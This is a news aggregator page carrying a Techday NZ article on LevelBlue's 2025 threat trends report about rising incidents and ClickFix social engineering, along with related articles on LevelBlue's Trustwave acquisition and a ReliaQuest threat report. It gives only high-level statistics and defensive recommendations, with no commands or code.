LevelBlue warns cyber incidents jump as social engineering rises
Incident rates rise
The report, analysing data from January through May 2025, shows that the percentage of LevelBlue customers experiencing cybersecurity incidents surged from 6% in the second half of 2024 to 17% in 2025. This threefold increase highlights escalating risks to organisations across various sectors.
The report attributes this sharp rise in part to evolving tactics employed by cybercriminals. While Business Email Compromise (BEC) continues to be the most frequent method for gaining initial access to systems, there has been notable growth in alternative approaches. Non-BEC incidents increased by 214%, indicating that attackers are diversifying their methods to infiltrate networks.
Faster breakout times
LevelBlue's findings indicate that once attackers penetrate a network, they are moving laterally inside these environments at unprecedented speeds. The average breakout time (the duration between initial access and lateral movement) has now dropped to under 60 minutes, with certain cases recorded at less than 15 minutes.
Social engineering surge
The report points to a considerable surge in social engineering attacks, with 39% of initial access incidents linked to these techniques. This trend is particularly evident in the prevalence of fake CAPTCHA-based attacks, such as ClickFix campaigns. These campaigns, designed to trick users into providing credentials or executing malware, saw an increase of 1,450% from the second half of 2024 to the first half of 2025. A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception. They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026.
This detailed assessment comes from Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, underscoring a consistent and increasing sophistication in attackers' use of deception as part of their strategies.
Recommendations for defence
In response to these trends, LevelBlue has set out several recommendations for organisations seeking to bolster their cyber defences. These include raising awareness among users about threats posed by fake CAPTCHA attacks and other browser-based vectors, and considering restrictions on PowerShell or command prompt use for non-administrator accounts.
The report suggests that firms develop and enforce caller verification protocols, such as multi-factor authentication (MFA), code words or phrases, or the use of identity verification platforms. It also advises mandatory implementation of MFA and digital certificates for VPN access, as well as deployment of jump boxes for remote desktop access from outside organisational networks.
Another recommendation is the removal of Quick Assist from all end-user machines unless there is a specific business requirement, alongside following established guidelines to prevent the unauthorised download and execution of remote monitoring and management (RMM) software. The report notes that in help desk-themed attacks, threat actors may leverage other tools if Quick Assist is unavailable.
Patch management also features prominently among suggested actions. Organisations are reminded to remain vigilant regarding vulnerabilities and to install updates promptly - especially where proof-of-concept exploits have been publicly released.
Working together on cyber threats
The LevelBlue Security Operations Centre collaborates closely with LevelBlue Labs researchers to monitor evolving threats and develop effective countermeasures. This teamwork involves sharing intelligence and methodologies as well as joint research projects, with the aim of strengthening defences across client organisations.
The LevelBlue Threat Trends Report is intended to provide organisations with clear insight into current cyber threat landscapes and practical steps to reduce exposure to increasing and more sophisticated attacks.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Techday NZ
30-07-2025
- Techday NZ
LevelBlue warns cyber incidents jump as social engineering rises
LevelBlue has released its latest Threat Trends Report, revealing significant changes in cyberattack patterns and a marked increase in incident rates during the first half of 2025. Incident rates rise The report, analysing data from January through May 2025, shows that the percentage of LevelBlue customers experiencing cybersecurity incidents surged from 6% in the second half of 2024 to 17% in 2025. This threefold increase highlights escalating risks to organisations across various sectors. The report attributes this sharp rise in part to evolving tactics employed by cybercriminals. While Business Email Compromise (BEC) continues to be the most frequent method for gaining initial access to systems, there has been notable growth in alternative approaches. Non-BEC incidents increased by 214%, indicating that attackers are diversifying their methods to infiltrate networks. Faster breakout times LevelBlue's findings indicate that once attackers penetrate a network, they are moving laterally inside these environments at unprecedented speeds. The average breakout time (the duration between initial access and lateral movement) has now dropped to under 60 minutes, with certain cases recorded at less than 15 minutes. Social engineering surge The report points to a considerable surge in social engineering attacks, with 39% of initial access incidents linked to these techniques. This trend is particularly evident in the prevalence of fake CAPTCHA-based attacks, such as ClickFix campaigns. These campaigns, designed to trick users into providing credentials or executing malware, saw an increase of 1,450% from the second half of 2024 to the first half of 2025. A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception. They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026. This detailed assessment comes from Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, underscoring a consistent and increasing sophistication in attackers' use of deception as part of their strategies. Recommendations for defence In response to these trends, LevelBlue has set out several recommendations for organisations seeking to bolster their cyber defences. These include raising awareness among users about threats posed by fake CAPTCHA attacks and other browser-based vectors, and considering restrictions on PowerShell or command prompt use for non-administrator accounts. The report suggests that firms develop and enforce caller verification protocols, such as multi-factor authentication (MFA), code words or phrases, or the use of identity verification platforms. It also advises mandatory implementation of MFA and digital certificates for VPN access, as well as deployment of jump boxes for remote desktop access from outside organisational networks. Another recommendation is the removal of Quick Assist from all end-user machines unless there is a specific business requirement, alongside following established guidelines to prevent the unauthorised download and execution of remote monitoring and management (RMM) software. The report notes that in help desk-themed attacks, threat actors may leverage other tools if Quick Assist is unavailable. Patch management also features prominently among suggested actions. Organisations are reminded to remain vigilant regarding vulnerabilities and to install updates promptly - especially where proof-of-concept exploits have been publicly released. Working together on cyber threats The LevelBlue Security Operations Centre collaborates closely with LevelBlue Labs researchers to monitor evolving threats and develop effective countermeasures. This teamwork involves sharing intelligence and methodologies as well as joint research projects, with the aim of strengthening defences across client organisations. The LevelBlue Threat Trends Report is intended to provide organisations with clear insight into current cyber threat landscapes and practical steps to reduce exposure to increasing and more sophisticated attacks.
Techday NZ
04-07-2025
- Techday NZ
LevelBlue acquires Trustwave to form largest global MSSP
LevelBlue has entered into an agreement to acquire Trustwave, expanding its capabilities in managed security services and managed detection and response. The acquisition of Trustwave from MC2 Security Fund is expected to create the world's largest independent, pure-play managed security services provider. This move closely follows LevelBlue's recent agreement to purchase Aon's cybersecurity consulting business, further consolidating its position in the cyber defence sector. Expanded capabilities Trustwave's Fusion Platform and cloud-native MDR service will be integrated into LevelBlue's offering. The merger aims to deliver 24/7 cybersecurity protection across global markets, enhancing visibility and control over security operations for organisations of varying scales. The combined portfolio is anticipated to create a strategically unified managed defence platform. It will leverage LevelBlue's artificial intelligence-driven threat detection capabilities and Trustwave's SpiderLabs unit for threat research and intelligence. The joint offering targets organisations operating across cloud, hybrid, and on-premises environments. Trustwave recently achieved full authorised status from the US Federal Risk and Authorization Management Program (FedRAMP) and StateRAMP, which will enable LevelBlue to meet requirements for US federal and state projects, including those with stringent security demands such as the Department of Defense and Cybersecurity Maturity Model Certification (CMMC). "The acquisition of Trustwave represents a pivotal moment for LevelBlue and the cybersecurity industry," said Robert McCullen, Chairman and CEO of LevelBlue. "Trustwave's extensive expertise in managed detection and response services, combined with its unparalleled threat intelligence from SpiderLabs and mission-critical FedRAMP and StateRAMP authorizations, perfectly aligns with our vision to deliver simplified and powerful cybersecurity protection to organisations. This strategic move reflects our commitment to delivering better cybersecurity outcomes to our customers and enhances our global go-to-market capabilities, as well as in the U.S. federal, state, and local government markets." Eric Harmon, Chief Executive Officer of Trustwave, said, "We're thrilled to partner with LevelBlue to drive our next phase of growth and unlock even greater cyber value for our clients. The threat landscape continues to evolve at an increasingly rapid pace. This announcement reinforces Trustwave's market leadership, and together with LevelBlue, positions us to further strengthen our combined leadership position, bolster our offensive and defensive security portfolio, and drive additional innovation to further safeguard and fortify our clients against disruptive and damaging cyber threats." Market response Trustwave, headquartered in Chicago and operating globally, employs over 1,000 security professionals. It is recognised as an industry leader in managed detection and response, managed security services, cybersecurity advisory, penetration testing, database, and email security. Its SpiderLabs team contributes threat research and intelligence, integrated into its product and service suite. Market analysts noted the significance of the deal, particularly in light of recent consolidations in the managed security sector. Christina Richmond, Principal Analyst at Richmond Advisory Group, stated, "Two longtime leaders in MSS and MDR coming together signals market maturation and industry consolidation, but also a powerhouse opportunity. Trustwave's SpiderLabs team and Fusion platform integrated with LevelBlue's threat intelligence and machine learning capabilities, backed by the Open Threat Exchange (OTX), will enhance threat detection and response on a cloud-based platform. Add in the recently announced acquisition of Aon's Cybersecurity and Intellectual Property Litigation consulting groups, and the potential for a full-service global cybersecurity and risk management firm is apparent." Strategic impact The acquisition fits into LevelBlue's broader approach of merging complementary organisations to build a stronger, more integrated offering for clients, specifically addressing increased demand for comprehensive managed cybersecurity solutions. Bringing together the two companies will position LevelBlue as the largest independent, pure-play MSSP globally. Chad Sweet, Chairman of Trustwave and Co-Founder of The Chertoff Group / MC2, expressed support for the acquisition. "Joining forces with LevelBlue marks an exciting new chapter for Trustwave and our clients. The combination of LevelBlue's AI threat detection and Trustwave's FedRAMP and StateRAMP authorized Fusion Intelligent Security Operations Platform enables leading-edge cybersecurity protection for enterprises and government clients." Shawn Hakl, Head of AT&T Business Products, commented on the significance of the certification aspects. "FedRAMP and StateRAMP certified managed detection and response capabilities are an exciting expansion to LevelBlue's managed security services. This business combination positions LevelBlue as a strategic provider of cybersecurity services in AT&T's portfolio, especially to our valued federal customers." Financial advice for LevelBlue was provided by Santander, with legal counsel from Kirkland & Ellis. Trustwave's advisors included Guggenheim Securities and Pillsbury Winthrop Shaw Pittman. Strategic advice will be provided by The Chertoff Group to help accelerate growth in the managed detection and response market segment. The financial terms of the deal were not disclosed, and the acquisition remains subject to customary closing conditions.
Techday NZ
19-06-2025
- Techday NZ
ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base. ClickFix and social engineering tactics One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics." Lateral movement and initial access trends Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems." Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors. MSHTA on the rise for defence evasion MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details. Changes in ransomware operations The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders." Impact on industry sectors The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign. Malware trends and threat actor activity The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments. Emergence of Scattered Spider Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack." Recommendations and defensive measures ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
